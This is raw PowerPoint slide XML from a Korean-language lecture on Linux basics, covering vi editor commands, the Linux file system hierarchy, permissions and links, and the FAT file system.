          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F87AA074-A11C-4379-840D-A23BA7E0EEEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8408962" y="3599491"/>
            <a:ext cx="386764" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="화살표: 오른쪽 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{065A0B67-BBF1-4952-9971-E3CEAA85DB02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8768477" y="3659681"/>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28887D4E-84D6-4D9F-AE42-BA8181B6783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7726332" y="4171730"/>
            <a:ext cx="516591"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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="화살표: 오른쪽 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00D2EE2D-E6EC-41A9-B30D-6F25B6DCEE51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="8994653" y="3658036"/>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TextBox 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE07409E-E44A-4471-86BE-F6F765F26CDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9248468" y="3599491"/>
            <a:ext cx="386764"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a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42225446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vi : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 기본 편집기</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </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40" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0530845-4185-455A-9514-70D5BAA7BC4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3430041179"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1743398" y="2663161"/>
          <a:ext cx="7951664" cy="1531678"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2529175">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5422489">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="157936">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5793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직전에 내린 명령을 취소</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0028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‘exp’ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>와 같은 문자열을 현재 커서가 위치한 곳부터 아래 방향으로 검색</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5801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?exp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‘exp’ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>와 같은 문자열을 뒤에서부터 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>윗</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 방향으로 검색</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57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찾은 문자 중에서 다음 문자로 이동</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157570">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shift + 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찾은 문자 중에서 이전 문자로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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31438349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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>usr</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1386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14" name="타원 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A03EF22-1F43-4BA2-802B-035798714593}"/>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5" name="타원 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF206B3A-240C-4F18-AC71-245AC16E94A1}"/>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16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6EC8A16-26B1-4B6E-AA5B-2B2DEB775197}"/>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17" name="직선 화살표 연결선 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D53CBAC4-8B67-42F9-9607-49B5A5914F14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15"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8415A46-B843-4F0F-AC2E-B89C8654E544}"/>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19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6302E5C3-6766-429C-B263-F7B57A3A455F}"/>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20" name="직선 화살표 연결선 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687471F3-3B10-4136-855C-593685FE5A71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18"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국방과학연구소 사이버 연수원 – Apps i Google Play">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{948E1B46-875D-4968-A193-286FC639B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124" y="2550902"/>
            <a:ext cx="1200397" cy="120039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국방과학연구소 연구원 퇴직 때 기밀 68만건 빼내…수사 착수 :: 공감언론 뉴시스통신사 ::">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5877791A-11B3-4B78-885F-1A0B7FD21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841" y="2814429"/>
            <a:ext cx="2897203" cy="19963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42A30F-992E-49F9-9352-7D153FD0D5B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286213" y="4871439"/>
            <a:ext cx="2167247" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>서울 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>본부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>사이버</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="그림 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0DF5B89-29AB-4583-AA0A-2FC756E18CA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6004171" y="1141302"/>
            <a:ext cx="5074530" cy="3714080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29B7D774-AFFF-44F4-8FF6-DFE4F739CA4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6665578" y="4901788"/>
            <a:ext cx="5658592" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://ieeexplore.ieee.org/document/8999252</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="그룹 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A3E2738-58D8-4FF0-8EBB-271C94E7BEAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="사각형: 둥근 모서리 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F57075-B468-4D16-AF1C-B068219586F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2F0B2CF3-2FCD-4C98-BA1E-CB48E9DB279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4" name="화살표: 오른쪽 23">
              <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6026BBCE-FDF6-4655-AECA-E69FBEC847A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1807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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>usr</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8257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파일 시스템</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922218446"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3311001" y="2694101"/>
          <a:ext cx="5569998" cy="2216277"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1207952">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3277713">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1084333">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="675141242"/>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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Def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정의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종류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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>History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역사</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FSSTND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 파일시스템 표준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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>T2</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pwd,ls,cd</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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Structure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구조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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>TimeStamp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타임스탬프</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Permission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권한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9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Link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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>링킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 시스템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0" action="ppaction://hlinksldjump"/>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 패스워드 구조</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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="화살표: 오른쪽 7">
            <a:hlinkClick r:id="rId11"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35675BE6-75B9-4343-8CAC-C3B6423D6989}"/>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82C54F79-DAAC-4490-A6E9-E0A75B5B0F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FFE852C-E130-4663-9210-92E2E4498C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2" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA318EC3-8874-4309-B7D6-2BD104F10B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76164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이란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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28AAD373-7753-4C96-B8AC-6E8251D91388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286378" y="1907769"/>
            <a:ext cx="9187112" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>운영체제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>파일</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>이나 자료를 쉽게 발견 및 접근할 수 있도록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>보관 또는 조직</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Noto Sans"/>
              </a:rPr>
              <a:t>하는 체제</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="직사각형 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A50CAAA6-B1B6-4348-A091-D9D6A83E0824}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6214308" y="2890663"/>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317" y="3333223"/>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1427568" y="3026021"/>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6564229" y="3678528"/>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4687306" y="3041058"/>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4687305" y="3647283"/>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2345480" y="3156826"/>
            <a:ext cx="724093"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5662864" y="3712686"/>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3069573" y="3041057"/>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3069573" y="3346584"/>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21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4045132" y="3411987"/>
            <a:ext cx="642173" cy="300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1375126" y="2941720"/>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E26F3793-A531-4CE8-8CA3-6758CCB93D35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556841" y="2688732"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="그룹 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDBD3273-C6E7-4C46-BB25-A59FF0F81951}"/>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7D666794-A86E-4C60-83E1-944F40D780D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4896C1E8-7C7F-4A0E-A6F3-692D368D17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2" name="화살표: 오른쪽 21">
              <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5545ECC6-1989-4C07-AC79-D9E28CD42E0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86357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종류</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{847A5460-5906-4590-B2F0-D17A5A4F9C37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954965" y="2113808"/>
            <a:ext cx="3258422" cy="4043548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="7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F A T</a:t>
            </a:r>
          </a:p>
          <a:p>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a:t>File Allocation Table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일을 할당한 정보를 테이블로 표현</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구조가 간단</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>디스크 용량을 많이 소모하지 않음</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>저용량 볼륨에서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대용량 볼륨의 비효율적 이용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NT, DOS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>윈도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>95, USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>등</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용</a:t>
            </a:r>
          </a:p>
          <a:p>
